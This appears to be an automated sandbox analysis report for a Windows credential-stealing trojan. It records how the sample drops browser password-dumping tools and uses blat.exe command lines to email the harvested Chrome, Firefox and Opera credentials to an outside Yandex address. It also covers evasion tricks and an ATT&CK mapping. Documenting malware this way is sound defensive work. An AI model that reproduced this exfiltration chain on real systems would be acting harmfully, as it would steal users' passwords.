              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_004123B0 push eax; ret | 20_2_004123DE
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_004123B0 push eax; ret | 22_2_004123DE
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: C:\Users\user\AppData\Local\Temp\ .exe | File created: \ .exe
              Source: C:\Users\user\AppData\Local\Temp\ .exe | File created: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe
              Source: C:\Users\user\AppData\Local\Temp\ .exe | File created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.dll
              Source: C:\Users\user\AppData\Local\Temp\ .exe | File created: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe
              Source: C:\Users\user\AppData\Local\Temp\ .exe | File created: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe
              Source: C:\Users\user\AppData\Local\Temp\ .exe | File created: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe
              Source: C:\Users\user\AppData\Local\Temp\ .exe | File created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | File created: C:\Users\user\AppData\Local\Temp\ .exe
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Code function: 11_2_0040B251 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 11_2_0040B251
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\ .exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess | graph_0-226
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 120 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Code function: 0_2_0040144A rdtsc | 0_2_0040144A
              Source: C:\Users\user\AppData\Local\Temp\ .exe | Window / User API: threadDelayed 4972
              Source: C:\Users\user\AppData\Local\Temp\ .exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\600.tmp\blat.dll
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | API coverage: 9.5 %
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | API coverage: 6.8 %
              Source: C:\Users\user\AppData\Local\Temp\ .exe TID: 7336 | Thread sleep count: 4972 > 30
              Source: C:\Users\user\AppData\Local\Temp\ .exe TID: 7336 | Thread sleep time: -124300s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8176 | Thread sleep count: 118 > 30
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8176 | Thread sleep time: -118000s >= -30000s
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\ .exe | Thread sleep count: Count: 4972 delay: -25
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Code function: 11_2_0040518C FindFirstFileW,FindNextFileW,wcslen,wcslen | 11_2_0040518C
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Code function: 11_2_00404D0E FindFirstFileW,FindNextFileW,FindClose | 11_2_00404D0E
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_004063F9 FindFirstFileA,FindNextFileA,strlen,strlen | 13_2_004063F9
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_00405798 FindFirstFileW,FindNextFileW,wcslen,wcslen | 15_2_00405798
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_004058AD malloc,ReadFile,strcpy,strrchr,strrchr,strrchr,FindFirstFileA,strcpy,strcat,malloc,malloc,strlen,malloc,memcpy,FindNextFileA,FindClose | 20_2_004058AD
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_0040B976 lstrcpyA,FindFirstFileA,FindClose | 20_2_0040B976
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_004058AD malloc,ReadFile,strcpy,strrchr,strrchr,strrchr,FindFirstFileA,strcpy,strcat,malloc,malloc,strlen,malloc,memcpy,FindNextFileA,FindClose | 22_2_004058AD
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_0040B976 lstrcpyA,FindFirstFileA,FindClose | 22_2_0040B976
              Source: blat.exe, 0000001D.00000002.2735034290.0000000000504000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
              Source: blat.exe, 00000016.00000002.2480567758.0000000000558000.00000004.00000020.00020000.00000000.sdmp, blat.exe, 00000019.00000002.2562572459.0000000000714000.00000004.00000020.00020000.00000000.sdmp, blat.exe, 0000001B.00000002.2653078613.0000000000714000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | API call chain: ExitProcess graph end node | graph_0-179
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | API call chain: ExitProcess graph end node | graph_0-205
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | API call chain: ExitProcess graph end node | graph_0-229
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | API call chain: ExitProcess graph end node | graph_0-146
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | API call chain: ExitProcess graph end node | graph_0-231
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Code function: 0_2_0040144A rdtsc | 0_2_0040144A
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Code function: 0_2_00401340 LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetEnvironmentVariableA | 0_2_00401340
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Code function: 0_2_00401157 mov eax, dword ptr fs:[00000030h] | 0_2_00401157
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Code function: 0_2_00401169 mov eax, dword ptr fs:[00000030h] | 0_2_00401169
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Code function: 0_2_00401AD8 GetCommandLineA,GetModuleHandleA,GetProcessHeap,ExitProcess,CreateWindowExA | 0_2_00401AD8
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00403B70 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter | 1_2_00403B70
              Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00403CC0 SetUnhandledExceptionFilter | 1_2_00403CC0
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Process created: C:\Users\user\AppData\Local\Temp\ .exe "C:\Users\user\AppData\Local\Temp\ .exe"
              Source: C:\Users\user\AppData\Local\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" "
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe OperaPassView.exe /stext user-PC_OperaPassView.txt
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe PasswordFox.exe /stext user-PC_PasswordFox.txt
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe iepv.exe /stext user-PC_iepv.txt
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe ChromePass.exe /stext user-PC_ChromePass.txt
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 120 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe OperaPassView.exe /stext user-PC_OperaPassView.txt
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "user-PC_OperaPassView.txt" -body "Opera"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Fox" -attachi "user-PC_PasswordFox.txt" -body "Fox"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe ChromePass.exe /stext user-PC_ChromePass.txt
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Chrome" -attachi "user-PC_ChromePass.txt" -body "Chrome"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_0040D702 GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy | 15_2_0040D702
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_0040A9D8 _EH_prolog,strcmp,strcpy,sprintf,sprintf,strchr,strchr,strcpy,strchr,strchr,rand,rand,rand,strcpy,strcpy,GetLocalTime,GetTimeZoneInformation,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,sprintf,GetSystemTimeAsFileTime,GetCurrentProcessId,sprintf,sprintf,sprintf,lstrcmpA,sprintf,memcpy,strcpy,strcpy,strcat,strcpy,strcat,strcmp,sprintf,sprintf,strstr | 20_2_0040A9D8
              Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00403CD7 GetVersionExA,GetVersionExA,GetVersionExA | 1_2_00403CD7
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: ChromePass.exe PID: 8164, type: MEMORYSTR
              Source: Yara match | File source: 11.2.PasswordFox.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: PasswordFox.exe PID: 8052, type: MEMORYSTR
              Source: Yara match | File source: 9.2.OperaPassView.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: Process Memory Space: OperaPassView.exe PID: 7972, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 | 13_2_00406B85
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 | 13_2_00406B3F
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: ChromePass.exe PID: 8164, type: MEMORYSTR
              Source: Yara match | File source: 11.2.PasswordFox.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: PasswordFox.exe PID: 8052, type: MEMORYSTR
              Source: Yara match | File source: 9.2.OperaPassView.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: Process Memory Space: OperaPassView.exe PID: 7972, type: MEMORYSTR

              MITRE ATT&CK Matrix (one line per tactic; a technique's leading number is carried over from the report's matrix as shown there)

              Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
              Resource Development: 1 Scripting, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
              Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
              Execution: 111 Native API, 3 Command and Scripting Interpreter, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
              Persistence: 1 Scripting, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
              Privilege Escalation: 1 DLL Side-Loading, 1 Access Token Manipulation, 11 Process Injection, Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
              Defense Evasion: 1 Deobfuscate/Decode Files or Information, 21 Obfuscated Files or Information, 11 Software Packing, 1 DLL Side-Loading, 2 Virtualization/Sandbox Evasion, 1 Access Token Manipulation, 11 Process Injection, Indicator Removal from Tools
              Credential Access: 2 OS Credential Dumping, 1 Input Capture, 1 Credentials In Files, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
              Discovery: 2 System Time Discovery, 2 File and Directory Discovery, 4 System Information Discovery, 121 Security Software Discovery, 2 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 Remote System Discovery, 1 System Network Configuration Discovery
              Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
              Collection: 1 Archive Collected Data, 1 Data from Local System, 1 Input Capture, 2 Clipboard Data, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
              Command and Control: 2 Encrypted Channel, 1 Non-Standard Port, 1 Non-Application Layer Protocol, 11 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
              Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Behavior Graph ID: 1559606 | Sample: 0zu73p2YBu | Startdate: 20/11/2024 | Architecture: WINDOWS | Score: 100
• Start: DNS/IP: yandex.ru, smtp.yandex.ru. Signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Opera Password Stealer; 5 other signatures
• 0zu73p2YBu.exe started. Dropped: C:\Users\user\AppData\Local\Temp\...\.exe, PE32. Signature: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
• The dropped .exe started. Dropped: C:\Users\user\AppData\Local\Temp\...\blat.exe, PE32; C:\Users\user\AppData\Local\Temp\...\blat.dll, PE32; C:\Users\user\AppData\...\ChromePass.exe, PE32; 3 other files (none is malicious)
• cmd.exe started. Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
• iepv.exe, PasswordFox.exe and ChromePass.exe started, plus 17 other processes
• iepv.exe: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Contains functionality to steal Internet Explorer form passwords
• PasswordFox.exe: Tries to harvest and steal browser information (history, passwords, etc)
• Other processes: DNS/IP: 127.0.0.1 unknown unknown; smtp.yandex.ru 77.88.21.158, ports 49773, 49794, 49812, YANDEXRU Russian Federation

Source | Detection | Scanner | Label
0zu73p2YBu.exe | 100% | ReversingLabs | Win32.Trojan.Generic
0zu73p2YBu.exe | 100% | Avira | TR/Crypt.XDR.Gen
0zu73p2YBu.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | 100% | Avira | SPR/PassFox.R
C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | 100% | Avira | SPR/PSW.Gen
C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\ .exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | 61% | ReversingLabs | Win32.Hacktool.PasswordFox
C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | 61% | ReversingLabs | Win32.PUA.PassView
C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | 76% | ReversingLabs | Win32.Hacktool.PStorRevealer
C:\Users\user\AppData\Local\Temp\600.tmp\blat.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | 8% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | 71% | ReversingLabs | Win32.PUA.PassView
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.blat.net/ | 0% | Avira URL Cloud | safe
http://www.blat.net) | 0% | Avira URL Cloud | safe
http://www.blat.net/V | 0% | Avira URL Cloud | safe
http://https://.savesignIn | 0% | Avira URL Cloud | safe
http://www.blat.net)User-Agent: | 0% | Avira URL Cloud | safe
http://www.blat.net/h | 0% | Avira URL Cloud | safe
http://www.blat.net | 0% | Avira URL Cloud | safe
http://www.blat.netX-Mailer: | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
yandex.ru | 5.255.255.77 | true | false | | high
smtp.yandex.ru | 77.88.21.158 | true | false | | high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.blat.net)blat.exe, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://https://.savesignInOperaPassView.exe, 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.nirsoft.net/iepv.exe, 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmpfalse
                    high
                    http://www.blat.net/h .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395776689.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480455991.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501598450.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583455609.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674118562.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.blat.netblat.exe.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.blat.net/V .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.dll.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.blat.net/ .exefalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.blat.net)User-Agent: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395717223.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000014.00000000.2395093923.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.blat.netX-Mailer: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395717223.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000014.00000000.2395093923.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
77.88.21.158 | smtp.yandex.ru | Russian Federation | 13238 | YANDEXRU | false
IP
127.0.0.1
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1559606
                    Start date and time:2024-11-20 18:14:05 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 48s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:31
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:0zu73p2YBu.exe
                    (renamed file extension from none to exe, renamed because original name is a hash value)
                    Original Sample Name:01356f359af7ecda0db1b00ebcb7bc844ce1fb36bbdbf812bf4a749c22f0d620
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@46/28@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 147
                    • Number of non-executed functions: 369
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: 0zu73p2YBu.exe
Time | Type | Description
12:15:35 | API Interceptor | 3776x Sleep call for process: .exe modified
12:15:39 | API Interceptor | 87x Sleep call for process: PING.EXE modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
77.88.21.158 | REQUEST FOR OFFER EQUIPMENT ORDER LIST.exe | malicious | AgentTesla |
 | DHL Delivery Invoice.com.exe | malicious | AgentTesla |
 | Transferencias6231.vbs | malicious | AgentTesla, GuLoader |
 | Justificante de pago.vbs | malicious | AgentTesla, GuLoader |
 | Justificante de pago.vbs | malicious | AgentTesla, GuLoader |
 | TRANSFERENCIA BANCARIA.vbs | malicious | AgentTesla, GuLoader |
 | xBneIooWzQjjOOg.exe | malicious | AgentTesla |
 | Justificante_13087.vbe | malicious | AgentTesla, GuLoader |
 | ORDER FRANCAP.vbs | malicious | AgentTesla, GuLoader |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
smtp.yandex.ru | REQUEST FOR OFFER EQUIPMENT ORDER LIST.exe | malicious | AgentTesla | 77.88.21.158
 | DHL Delivery Invoice.com.exe | malicious | AgentTesla | 77.88.21.158
